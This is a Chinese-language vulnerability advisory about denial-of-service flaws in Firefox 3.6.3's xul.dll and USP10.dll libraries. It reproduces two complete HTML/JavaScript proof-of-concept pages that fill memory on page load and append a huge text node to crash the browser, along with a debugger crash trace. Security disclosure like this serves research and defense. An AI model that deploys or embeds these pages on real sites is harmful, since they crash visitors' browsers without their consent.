Firefox USP10.dll和xul.dll库多个拒绝服务漏洞

发表评论 (0) 查看评论

受影响系统:

Mozilla Firefox 3.6.3

描述:
Firefox是非常流行的开源WEB浏览器。

Firefox的xul.dll库中的gfxWindowsFontGroup::MakeTextRun函数和USP10.dll库的DoubleWideCharMappedString类中存在多个拒绝服务漏洞。如果网页中的JavaScript代码可创建包含有超长字符串元素的数组之后将超长字符串附加到了P元素的内容,就会触发内存破坏或空指针引用,导致浏览器崩溃。

<*来源:x90c (http://www.x90c.org)
  
  链接:http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

[PoC #1 – firefox_3.6.3_dos_poc_1.htm] —

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">

function append_text_into_body()
{
    var p1 = document.getElementById(‘p1’);
    var Text1 = "";
    var TextNode = null;

    // Trigger! MakeFont… into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }

    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);    // Memory Exhaustion makes FireFox can’t make Texts it caused an crash.
}

var arr1, arr2, arr3, arr4, arr5;
var a = 1;

var timer;

function fill_all_memory()
{
    var chunk = unescape("%u4141%u4141");
    var i = 0;

    if( a > 5 )
    {
        a++;
    }
    if(a >= 30)
    {
        append_text_into_body();
    }

    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);

    if(a == 1)
    {
        arr1 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr1[i] = chunk;
        }
        a = 2;
    }
    else if(a == 2)
    {
        arr2 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr2[i] = chunk;
        }
        a = 3;
    }
    else if(a == 3)
    {
        arr3 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr3[i] = chunk;
        }
        a = 4;
    }
    else if(a == 4)
    {
        arr4 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr4[i] = chunk;
        }
        a = 5;
    }
    else if(a == 5)
    {
        arr5 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr5[i] = chunk;
        }
        a = 6;
    }
}

function try_fill()
{
    fill_all_memory();
    setTimeout("try_fill();", 500);
}

</SCRIPT>
</HEAD>

<BODY onload="try_fill();">
<P id=’p1′></P>
</BODY>
</HTML>

[PoC #2 – firefox_3.6.3_dos_poc_2.htm] —

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">

function append_text_into_body()
{
    var p1 = document.getElementById(‘p1’);
    var Text1 = "";
    var TextNode = null;

    // Trigger! MakeFont… into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }

    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);    // Memory Exhaustion makes FireFox can’t make Texts it caused an crash.
}

var a = 1;

var timer;

function fill_all_memory()    // This function’s variation can makes an null pointer deref without append_text_into_body() calling.
{
    var chunk = unescape("%u4141%u4242");
    var i = 0;

    append_text_into_body();

    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);
}

function try_fill()
{
    fill_all_memory();
    // this poc makes 99% almost crashed same location as below.
    // 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
    //       73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=????
    // 100: ”
    // 150: ”
    // 200: ”
    // 300: ”
    // 500: ”
    // 1000: ”
    // 5000: ”
    setTimeout("try_fill();", 10);
}

</SCRIPT>
</HEAD>

<BODY onload="try_fill();">
<P id=’p1′></P>
</BODY>

</HTML>

建议:

厂商补丁:

Mozilla
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/

发表评论?

0 条评论。

发表评论